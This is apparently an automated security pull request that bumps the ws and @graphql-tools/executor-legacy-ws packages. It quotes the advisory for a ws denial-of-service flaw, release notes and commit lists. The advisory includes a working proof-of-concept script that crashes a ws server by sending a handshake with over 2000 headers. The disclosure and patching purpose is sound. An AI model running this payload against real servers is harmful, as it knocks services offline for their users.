
[Security] Bump ws and @graphql-tools/executor-legacy-ws

Bumps ws and @graphql-tools/executor-legacy-ws. These dependencies needed to be updated together. Updates ws from 8.13.0 to 8.17.1. This update includes a security fix.

Vulnerabilities fixed

ws affected by a DoS when handling a request with many HTTP headers

Impact

A request with a number of headers exceeding the server.maxHeadersCount threshold could be used to crash a ws server.

Proof of concept

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];

... (truncated)

Patched versions: 8.17.1
Affected versions: >= 8.0.0, < 8.17.1

Release notes

Sourced from ws's releases.

8.17.1

Bug fixes

  • Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the server.maxHeadersCount threshold could be used to crash a ws server.

const http = require('http');
const WebSocket = require('ws');

// Start a ws server on a random port, then send it a handshake from the same process.
const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  // Build 2000 filler headers with distinct two-character names.
  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  // The handshake headers come after the filler, i.e. beyond the server.maxHeadersCount limit.
  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

In vulnerable versions of ws, the issue can be mitigated in the following ways:

  1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.

... (truncated)

Commits
  • 3c56601 [dist] 8.17.1
  • e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
  • 6a00029 [test] Increase code coverage
  • ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
  • b73b118 [dist] 8.17.0
  • 29694a5 [test] Use the highWaterMark variable
  • 934c9d6 [ci] Test on node 22
  • 1817bac [ci] Do not test on node 21
  • 96c9b3d [major] Flip the default value of allowSynchronousEvents (#2221)
  • e5f32c7 [fix] Emit at most one event per event loop iteration (#2218)
  • Additional commits viewable in compare view

Updates @graphql-tools/executor-legacy-ws from 1.0.1 to 1.0.6

Changelog

Sourced from @graphql-tools/executor-legacy-ws's changelog.

1.0.6

Patch Changes

1.0.5

Patch Changes

1.0.4

Patch Changes

1.0.3

Patch Changes

1.0.2

Patch Changes

Commits
  • f59d7d7 chore(release): update monorepo packages versions (#5929)
  • 83c0af0 No unnecessary inline fragment spreads for union types in federation and link...
  • a3259da chore(release): update monorepo packages versions (#5763)
  • 38a92ab Use ranged dependencies
  • 701cfd3 fix(deps): update dependency ws to v8.15.0 (#5762)
  • 1bd71cd chore(release): update monorepo packages versions (#5631)
  • 6c26c4f chore(deps): update all non-major dependencies (#5603)
  • 291b37b chore(release): update monorepo packages versions (#5577)
  • b153191 fix(deps): update all non-major dependencies (#5575)
  • b8b8164 chore(release): update monorepo packages versions (#5571)
  • Additional commits viewable in compare view
